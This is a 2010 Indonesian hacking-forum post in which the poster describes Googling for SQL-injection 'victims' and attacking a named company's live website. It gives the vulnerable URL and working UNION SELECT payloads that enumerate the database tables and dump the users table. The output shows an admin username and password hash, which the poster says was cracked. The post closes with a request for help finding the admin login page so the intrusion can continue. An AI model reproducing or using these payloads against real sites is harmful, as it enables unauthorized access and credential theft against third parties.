Sqli di http://www.nexian.co.id/
Posted: Mon May 10, 2010 10:12 pm
kemaren aku lagi surfing lewat mbah google, mau nyari korban sqli,
:devil :devil :devil
trus ketemu bug sqli di http://www.nexian.co.id/, ini holenya
aku coba nyari tabelnya
ini dia tabel2nya :
yg ini hole untuk id dan password adminnya
hasilnya
setelah passnya dicrack menjadi
tapi ada kendalanya, aku ngak bisa nemuin login pagenya, ada yg mau bantuin
:kaca: :kaca: :kaca:
:devil :devil :devil
trus ketemu bug sqli di http://www.nexian.co.id/, ini holenya
Code: Select all
http://www.nexian.co.id/news.php?mod=article&id=47
Code: Select all
http://www.nexian.co.id/news.php?mod=article&id=-47%20union%20select%20all%201,group_concat%28table_name%29,3,4%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Code: Select all
about,accessories,application,articles,career,commercial,contact,contactinfo,db_city,db_province,dealer,faq,music,product,type,users,wallpaper
Code: Select all
http://www.nexian.co.id/news.php?mod=article&id=-47%20union%20select%20all%201,group_concat%28username,0x3a,password%29,3,4%20from%20users
Code: Select all
admin:098f6bcd4621d373cade4e832627b4f6
Code: Select all
098f6bcd4621d373cade4e832627b4f6 => test
:kaca: :kaca: :kaca: